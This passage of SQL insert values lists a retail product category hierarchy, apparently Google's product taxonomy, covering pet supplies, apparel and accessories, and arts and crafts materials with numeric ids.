(105, 105, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Training Aids > Pet Training Pad Holders'),
(106, 106, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Training Aids > Pet Training Pads'),
(107, 107, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Training Aids > Pet Training Sprays & Solutions'),
(108, 108, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Vitamins & Supplements'),
(109, 109, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Waste Bag Dispensers & Holders'),
(110, 110, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Waste Bags'),
(111, 111, 0, 'Animals & Pet Supplies > Pet Supplies > Pet Waste Disposal Systems & Tools'),
(112, 112, 0, 'Animals & Pet Supplies > Pet Supplies > Reptile & Amphibian Supplies'),
(113, 113, 0, 'Animals & Pet Supplies > Pet Supplies > Reptile & Amphibian Supplies > Reptile & Amphibian Food'),
(114, 114, 0, 'Animals & Pet Supplies > Pet Supplies > Reptile & Amphibian Supplies > Reptile & Amphibian Habitat Accessories'),
(115, 115, 0, 'Animals & Pet Supplies > Pet Supplies > Reptile & Amphibian Supplies > Reptile & Amphibian Habitat Heating & Lighting'),
(116, 116, 0, 'Animals & Pet Supplies > Pet Supplies > Reptile & Amphibian Supplies > Reptile & Amphibian Habitats'),
(117, 117, 0, 'Animals & Pet Supplies > Pet Supplies > Reptile & Amphibian Supplies > Reptile & Amphibian Substrates'),
(118, 118, 0, 'Animals & Pet Supplies > Pet Supplies > Small Animal Supplies'),
(119, 119, 0, 'Animals & Pet Supplies > Pet Supplies > Small Animal Supplies > Small Animal Bedding'),
(120, 120, 0, 'Animals & Pet Supplies > Pet Supplies > Small Animal Supplies > Small Animal Food'),
(121, 121, 0, 'Animals & Pet Supplies > Pet Supplies > Small Animal Supplies > Small Animal Habitat Accessories'),
(122, 122, 0, 'Animals & Pet Supplies > Pet Supplies > Small Animal Supplies > Small Animal Habitats & Cages'),
(123, 123, 0, 'Animals & Pet Supplies > Pet Supplies > Small Animal Supplies > Small Animal Treats'),
(124, 124, 0, 'Animals & Pet Supplies > Pet Supplies > Vehicle Pet Barriers'),
(125, 125, 0, 'Apparel & Accessories'),
(126, 126, 0, 'Apparel & Accessories > Clothing'),
(127, 127, 0, 'Apparel & Accessories > Clothing > Activewear'),
(128, 128, 0, 'Apparel & Accessories > Clothing > Activewear > Bicycle Activewear'),
(129, 129, 0, 'Apparel & Accessories > Clothing > Activewear > Bicycle Activewear > Bicycle Bibs'),
(130, 130, 0, 'Apparel & Accessories > Clothing > Activewear > Bicycle Activewear > Bicycle Jerseys'),
(131, 131, 0, 'Apparel & Accessories > Clothing > Activewear > Bicycle Activewear > Bicycle Shorts & Briefs'),
(132, 132, 0, 'Apparel & Accessories > Clothing > Activewear > Bicycle Activewear > Bicycle Skinsuits'),
(133, 133, 0, 'Apparel & Accessories > Clothing > Activewear > Bicycle Activewear > Bicycle Tights'),
(134, 134, 0, 'Apparel & Accessories > Clothing > Activewear > Boxing Shorts'),
(135, 135, 0, 'Apparel & Accessories > Clothing > Activewear > Dance Dresses, Skirts & Costumes'),
(136, 136, 0, 'Apparel & Accessories > Clothing > Activewear > Football Pants'),
(137, 137, 0, 'Apparel & Accessories > Clothing > Activewear > Hunting Clothing'),
(138, 138, 0, 'Apparel & Accessories > Clothing > Activewear > Hunting Clothing > Ghillie Suits'),
(139, 139, 0, 'Apparel & Accessories > Clothing > Activewear > Hunting Clothing > Hunting & Fishing Vests'),
(140, 140, 0, 'Apparel & Accessories > Clothing > Activewear > Hunting Clothing > Hunting & Tactical Pants'),
(141, 141, 0, 'Apparel & Accessories > Clothing > Activewear > Martial Arts Shorts'),
(142, 142, 0, 'Apparel & Accessories > Clothing > Activewear > Motorcycle Protective Clothing'),
(143, 143, 0, 'Apparel & Accessories > Clothing > Activewear > Motorcycle Protective Clothing > Motorcycle Jackets'),
(144, 144, 0, 'Apparel & Accessories > Clothing > Activewear > Motorcycle Protective Clothing > Motorcycle Pants'),
(145, 145, 0, 'Apparel & Accessories > Clothing > Activewear > Motorcycle Protective Clothing > Motorcycle Suits'),
(146, 146, 0, 'Apparel & Accessories > Clothing > Activewear > Paintball Clothing'),
(147, 147, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing'),
(148, 148, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Bottoms'),
(149, 149, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Diaper Covers'),
(150, 150, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Dresses'),
(151, 151, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Outerwear'),
(152, 152, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Outfits'),
(153, 153, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Sleepwear'),
(154, 154, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Socks & Tights'),
(155, 155, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Swimwear'),
(156, 156, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby & Toddler Tops'),
(157, 157, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Baby One-Pieces'),
(158, 158, 0, 'Apparel & Accessories > Clothing > Baby & Toddler Clothing > Toddler Underwear'),
(159, 159, 0, 'Apparel & Accessories > Clothing > Dresses'),
(160, 160, 0, 'Apparel & Accessories > Clothing > One-Pieces'),
(161, 161, 0, 'Apparel & Accessories > Clothing > One-Pieces > Jumpsuits & Rompers'),
(162, 162, 0, 'Apparel & Accessories > Clothing > One-Pieces > Leotards & Unitards'),
(163, 163, 0, 'Apparel & Accessories > Clothing > One-Pieces > Overalls'),
(164, 164, 0, 'Apparel & Accessories > Clothing > Outerwear'),
(165, 165, 0, 'Apparel & Accessories > Clothing > Outerwear > Chaps'),
(166, 166, 0, 'Apparel & Accessories > Clothing > Outerwear > Coats & Jackets'),
(167, 167, 0, 'Apparel & Accessories > Clothing > Outerwear > Rain Pants'),
(168, 168, 0, 'Apparel & Accessories > Clothing > Outerwear > Rain Suits'),
(169, 169, 0, 'Apparel & Accessories > Clothing > Outerwear > Snow Pants & Suits'),
(170, 170, 0, 'Apparel & Accessories > Clothing > Outerwear > Vests'),
(171, 171, 0, 'Apparel & Accessories > Clothing > Outfit Sets'),
(172, 172, 0, 'Apparel & Accessories > Clothing > Pants'),
(173, 173, 0, 'Apparel & Accessories > Clothing > Shirts & Tops'),
(174, 174, 0, 'Apparel & Accessories > Clothing > Shorts'),
(175, 175, 0, 'Apparel & Accessories > Clothing > Skirts'),
(176, 176, 0, 'Apparel & Accessories > Clothing > Skorts'),
(177, 177, 0, 'Apparel & Accessories > Clothing > Sleepwear & Loungewear'),
(178, 178, 0, 'Apparel & Accessories > Clothing > Sleepwear & Loungewear > Loungewear'),
(179, 179, 0, 'Apparel & Accessories > Clothing > Sleepwear & Loungewear > Nightgowns'),
(180, 180, 0, 'Apparel & Accessories > Clothing > Sleepwear & Loungewear > Pajamas'),
(181, 181, 0, 'Apparel & Accessories > Clothing > Sleepwear & Loungewear > Robes'),
(182, 182, 0, 'Apparel & Accessories > Clothing > Suits'),
(183, 183, 0, 'Apparel & Accessories > Clothing > Suits > Pant Suits'),
(184, 184, 0, 'Apparel & Accessories > Clothing > Suits > Skirt Suits'),
(185, 185, 0, 'Apparel & Accessories > Clothing > Suits > Tuxedos'),
(186, 186, 0, 'Apparel & Accessories > Clothing > Swimwear'),
(187, 187, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing'),
(188, 188, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Dirndls'),
(189, 189, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Hakama Trousers'),
(190, 190, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Japanese Black Formal Wear'),
(191, 191, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Kimono Outerwear'),
(192, 192, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Kimonos'),
(193, 193, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Religious Ceremonial Clothing'),
(194, 194, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Religious Ceremonial Clothing > Baptism & Communion Dresses'),
(195, 195, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Saris & Lehengas'),
(196, 196, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Traditional Leather Pants'),
(197, 197, 0, 'Apparel & Accessories > Clothing > Traditional & Ceremonial Clothing > Yukata'),
(198, 198, 0, 'Apparel & Accessories > Clothing > Underwear & Socks'),
(199, 199, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Bra Accessories'),
(200, 200, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Bra Accessories > Bra Strap Pads'),
(201, 201, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Bra Accessories > Bra Straps & Extenders'),
(202, 202, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Bra Accessories > Breast Enhancing Inserts'),
(203, 203, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Bra Accessories > Breast Petals & Concealers'),
(204, 204, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Bras'),
(205, 205, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Hosiery'),
(206, 206, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Jock Straps'),
(207, 207, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Lingerie'),
(208, 208, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Lingerie Accessories'),
(209, 209, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Lingerie Accessories > Garter Belts'),
(210, 210, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Lingerie Accessories > Garters'),
(211, 211, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Long Johns'),
(212, 212, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Petticoats & Pettipants'),
(213, 213, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Shapewear'),
(214, 214, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Socks'),
(215, 215, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Undershirts'),
(216, 216, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Underwear'),
(217, 217, 0, 'Apparel & Accessories > Clothing > Underwear & Socks > Underwear Slips'),
(218, 218, 0, 'Apparel & Accessories > Clothing > Uniforms'),
(219, 219, 0, 'Apparel & Accessories > Clothing > Uniforms > Contractor Pants & Coveralls'),
(220, 220, 0, 'Apparel & Accessories > Clothing > Uniforms > Flight Suits'),
(221, 221, 0, 'Apparel & Accessories > Clothing > Uniforms > Food Service Uniforms'),
(222, 222, 0, 'Apparel & Accessories > Clothing > Uniforms > Food Service Uniforms > Chef\'s Hats'),
(223, 223, 0, 'Apparel & Accessories > Clothing > Uniforms > Food Service Uniforms > Chef\'s Jackets'),
(224, 224, 0, 'Apparel & Accessories > Clothing > Uniforms > Food Service Uniforms > Chef\'s Pants'),
(225, 225, 0, 'Apparel & Accessories > Clothing > Uniforms > Military Uniforms'),
(226, 226, 0, 'Apparel & Accessories > Clothing > Uniforms > School Uniforms'),
(227, 227, 0, 'Apparel & Accessories > Clothing > Uniforms > Security Uniforms'),
(228, 228, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms'),
(229, 229, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Baseball Uniforms'),
(230, 230, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Basketball Uniforms'),
(231, 231, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Cheerleading Uniforms'),
(232, 232, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Cricket Uniforms'),
(233, 233, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Football Uniforms'),
(234, 234, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Hockey Uniforms'),
(235, 235, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Martial Arts Uniforms'),
(236, 236, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Officiating Uniforms'),
(237, 237, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Soccer Uniforms'),
(238, 238, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Softball Uniforms'),
(239, 239, 0, 'Apparel & Accessories > Clothing > Uniforms > Sports Uniforms > Wrestling Uniforms'),
(240, 240, 0, 'Apparel & Accessories > Clothing > Uniforms > White Coats'),
(241, 241, 0, 'Apparel & Accessories > Clothing > Wedding & Bridal Party Dresses'),
(242, 242, 0, 'Apparel & Accessories > Clothing > Wedding & Bridal Party Dresses > Bridal Party Dresses'),
(243, 243, 0, 'Apparel & Accessories > Clothing > Wedding & Bridal Party Dresses > Wedding Dresses'),
(244, 244, 0, 'Apparel & Accessories > Clothing Accessories'),
(245, 245, 0, 'Apparel & Accessories > Clothing Accessories > Arm Warmers & Sleeves'),
(246, 246, 0, 'Apparel & Accessories > Clothing Accessories > Baby & Toddler Clothing Accessories'),
(247, 247, 0, 'Apparel & Accessories > Clothing Accessories > Baby & Toddler Clothing Accessories > Baby & Toddler Belts'),
(248, 248, 0, 'Apparel & Accessories > Clothing Accessories > Baby & Toddler Clothing Accessories > Baby & Toddler Gloves & Mittens'),
(249, 249, 0, 'Apparel & Accessories > Clothing Accessories > Baby & Toddler Clothing Accessories > Baby & Toddler Hats'),
(250, 250, 0, 'Apparel & Accessories > Clothing Accessories > Baby & Toddler Clothing Accessories > Baby Protective Wear'),
(251, 251, 0, 'Apparel & Accessories > Clothing Accessories > Balaclavas'),
(252, 252, 0, 'Apparel & Accessories > Clothing Accessories > Bandanas & Headties'),
(253, 253, 0, 'Apparel & Accessories > Clothing Accessories > Belt Buckles'),
(254, 254, 0, 'Apparel & Accessories > Clothing Accessories > Belts'),
(255, 255, 0, 'Apparel & Accessories > Clothing Accessories > Bridal Accessories'),
(256, 256, 0, 'Apparel & Accessories > Clothing Accessories > Bridal Accessories > Bridal Veils'),
(257, 257, 0, 'Apparel & Accessories > Clothing Accessories > Button Studs'),
(258, 258, 0, 'Apparel & Accessories > Clothing Accessories > Collar Stays'),
(259, 259, 0, 'Apparel & Accessories > Clothing Accessories > Cufflinks'),
(260, 260, 0, 'Apparel & Accessories > Clothing Accessories > Decorative Fans'),
(261, 261, 0, 'Apparel & Accessories > Clothing Accessories > Earmuffs'),
(262, 262, 0, 'Apparel & Accessories > Clothing Accessories > Gloves & Mittens'),
(263, 263, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories'),
(264, 264, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Bun & Volume Shapers'),
(265, 265, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Combs'),
(266, 266, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Extensions'),
(267, 267, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Forks & Sticks'),
(268, 268, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Nets'),
(269, 269, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Pins, Claws & Clips'),
(270, 270, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Hair Wreaths'),
(271, 271, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Headbands'),
(272, 272, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Ponytail Holders'),
(273, 273, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Tiaras'),
(274, 274, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Wig Accessories'),
(275, 275, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Wig Accessories > Wig Caps'),
(276, 276, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Wig Accessories > Wig Glue & Tape'),
(277, 277, 0, 'Apparel & Accessories > Clothing Accessories > Hair Accessories > Wigs'),
(278, 278, 0, 'Apparel & Accessories > Clothing Accessories > Hand Muffs'),
(279, 279, 0, 'Apparel & Accessories > Clothing Accessories > Handkerchiefs'),
(280, 280, 0, 'Apparel & Accessories > Clothing Accessories > Hats'),
(281, 281, 0, 'Apparel & Accessories > Clothing Accessories > Headwear'),
(282, 282, 0, 'Apparel & Accessories > Clothing Accessories > Headwear > Fascinators'),
(283, 283, 0, 'Apparel & Accessories > Clothing Accessories > Headwear > Headdresses'),
(284, 284, 0, 'Apparel & Accessories > Clothing Accessories > Headwear > Turbans'),
(285, 285, 0, 'Apparel & Accessories > Clothing Accessories > Leg Warmers'),
(286, 286, 0, 'Apparel & Accessories > Clothing Accessories > Leis'),
(287, 287, 0, 'Apparel & Accessories > Clothing Accessories > Maternity Belts & Support Bands'),
(288, 288, 0, 'Apparel & Accessories > Clothing Accessories > Neck Gaiters'),
(289, 289, 0, 'Apparel & Accessories > Clothing Accessories > Neckties'),
(290, 290, 0, 'Apparel & Accessories > Clothing Accessories > Pinback Buttons'),
(291, 291, 0, 'Apparel & Accessories > Clothing Accessories > Sashes'),
(292, 292, 0, 'Apparel & Accessories > Clothing Accessories > Scarves & Shawls'),
(293, 293, 0, 'Apparel & Accessories > Clothing Accessories > Sunglasses'),
(294, 294, 0, 'Apparel & Accessories > Clothing Accessories > Suspenders'),
(295, 295, 0, 'Apparel & Accessories > Clothing Accessories > Tie Clips'),
(296, 296, 0, 'Apparel & Accessories > Clothing Accessories > Traditional Clothing Accessories'),
(297, 297, 0, 'Apparel & Accessories > Clothing Accessories > Traditional Clothing Accessories > Obis'),
(298, 298, 0, 'Apparel & Accessories > Clothing Accessories > Traditional Clothing Accessories > Tabi Socks'),
(299, 299, 0, 'Apparel & Accessories > Clothing Accessories > Wristbands'),
(300, 300, 0, 'Apparel & Accessories > Costumes & Accessories'),
(301, 301, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories'),
(302, 302, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Bald Caps'),
(303, 303, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Costume Accessory Sets'),
(304, 304, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Costume Capes'),
(305, 305, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Costume Gloves'),
(306, 306, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Costume Hats'),
(307, 307, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Costume Special Effects'),
(308, 308, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Costume Tobacco Products'),
(309, 309, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Accessories > Pretend Jewelry'),
(310, 310, 0, 'Apparel & Accessories > Costumes & Accessories > Costume Shoes'),
(311, 311, 0, 'Apparel & Accessories > Costumes & Accessories > Costumes'),
(312, 312, 0, 'Apparel & Accessories > Costumes & Accessories > Masks'),
(313, 313, 0, 'Apparel & Accessories > Handbag & Wallet Accessories'),
(314, 314, 0, 'Apparel & Accessories > Handbag & Wallet Accessories > Checkbook Covers'),
(315, 315, 0, 'Apparel & Accessories > Handbag & Wallet Accessories > Keychains'),
(316, 316, 0, 'Apparel & Accessories > Handbag & Wallet Accessories > Lanyards'),
(317, 317, 0, 'Apparel & Accessories > Handbag & Wallet Accessories > Wallet Chains'),
(318, 318, 0, 'Apparel & Accessories > Handbags, Wallets & Cases'),
(319, 319, 0, 'Apparel & Accessories > Handbags, Wallets & Cases > Badge & Pass Holders'),
(320, 320, 0, 'Apparel & Accessories > Handbags, Wallets & Cases > Business Card Cases'),
(321, 321, 0, 'Apparel & Accessories > Handbags, Wallets & Cases > Handbags'),
(322, 322, 0, 'Apparel & Accessories > Handbags, Wallets & Cases > Wallets & Money Clips'),
(323, 323, 0, 'Apparel & Accessories > Jewelry'),
(324, 324, 0, 'Apparel & Accessories > Jewelry > Anklets'),
(325, 325, 0, 'Apparel & Accessories > Jewelry > Body Jewelry'),
(326, 326, 0, 'Apparel & Accessories > Jewelry > Bracelets'),
(327, 327, 0, 'Apparel & Accessories > Jewelry > Brooches & Lapel Pins'),
(328, 328, 0, 'Apparel & Accessories > Jewelry > Charms & Pendants'),
(329, 329, 0, 'Apparel & Accessories > Jewelry > Earrings'),
(330, 330, 0, 'Apparel & Accessories > Jewelry > Jewelry Sets'),
(331, 331, 0, 'Apparel & Accessories > Jewelry > Necklaces'),
(332, 332, 0, 'Apparel & Accessories > Jewelry > Rings'),
(333, 333, 0, 'Apparel & Accessories > Jewelry > Watch Accessories'),
(334, 334, 0, 'Apparel & Accessories > Jewelry > Watch Accessories > Watch Bands'),
(335, 335, 0, 'Apparel & Accessories > Jewelry > Watch Accessories > Watch Stickers & Decals'),
(336, 336, 0, 'Apparel & Accessories > Jewelry > Watch Accessories > Watch Winders'),
(337, 337, 0, 'Apparel & Accessories > Jewelry > Watches'),
(338, 338, 0, 'Apparel & Accessories > Shoe Accessories'),
(339, 339, 0, 'Apparel & Accessories > Shoe Accessories > Boot Liners'),
(340, 340, 0, 'Apparel & Accessories > Shoe Accessories > Gaiters'),
(341, 341, 0, 'Apparel & Accessories > Shoe Accessories > Shoe Covers'),
(342, 342, 0, 'Apparel & Accessories > Shoe Accessories > Shoelaces'),
(343, 343, 0, 'Apparel & Accessories > Shoe Accessories > Spurs'),
(344, 344, 0, 'Apparel & Accessories > Shoes'),
(345, 345, 0, 'Arts & Entertainment'),
(346, 346, 0, 'Arts & Entertainment > Event Tickets'),
(347, 347, 0, 'Arts & Entertainment > Hobbies & Creative Arts'),
(348, 348, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts'),
(349, 349, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits'),
(350, 350, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Candle Making Kits'),
(351, 351, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Drawing & Painting Kits'),
(352, 352, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Fabric Repair Kits'),
(353, 353, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Incense Making Kits'),
(354, 354, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Jewelry Making Kits'),
(355, 355, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Mosaic Kits'),
(356, 356, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Needlecraft Kits'),
(357, 357, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Scrapbooking & Stamping Kits'),
(358, 358, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Craft Kits > Toy Craft Kits'),
(359, 359, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials'),
(360, 360, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper'),
(361, 361, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Cardstock & Scrapbooking Paper'),
(362, 362, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Construction Paper'),
(363, 363, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Craft Foil'),
(364, 364, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Drawing & Painting Paper'),
(365, 365, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Origami Paper'),
(366, 366, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Transfer Paper'),
(367, 367, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Art & Craft Paper > Vellum Paper'),
(368, 368, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures'),
(369, 369, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures > Buttons & Snaps'),
(370, 370, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures > Clasps & Hooks'),
(371, 371, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures > Eyelets & Grommets'),
(372, 372, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures > Hook and Loop Fasteners'),
(373, 373, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures > Zipper Pulls'),
(374, 374, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Fasteners & Closures > Zippers'),
(375, 375, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze'),
(376, 376, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Art & Craft Paint'),
(377, 377, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Art Fixatives'),
(378, 378, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Art Ink'),
(379, 379, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Ceramic & Pottery Glazes'),
(380, 380, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Craft Dyes'),
(381, 381, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Ink Pads'),
(382, 382, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Paint, Ink & Glaze > Paint Mediums'),
(383, 383, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Shapes & Bases'),
(384, 384, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Shapes & Bases > Craft Foam & Styrofoam'),
(385, 385, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Shapes & Bases > Craft Wood & Shapes'),
(386, 386, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Shapes & Bases > Papier Mache Shapes'),
(387, 387, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Craft Shapes & Bases > Wreath & Floral Frames'),
(388, 388, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Adhesives & Magnets'),
(389, 389, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Adhesives & Magnets > Craft & Office Glue'),
(390, 390, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Adhesives & Magnets > Craft Magnets'),
(391, 391, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Adhesives & Magnets > Decorative Tape'),
(392, 392, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Adhesives & Magnets > Floral Tape'),
(393, 393, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Adhesives & Magnets > Fusible Tape'),
(394, 394, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Fibers'),
(395, 395, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Fibers > Jewelry & Beading Cord'),
(396, 396, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Fibers > Thread & Floss'),
(397, 397, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Fibers > Unspun Fiber'),
(398, 398, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Fibers > Yarn'),
(399, 399, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Wire'),
(400, 400, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Wire > Craft Pipe Cleaners'),
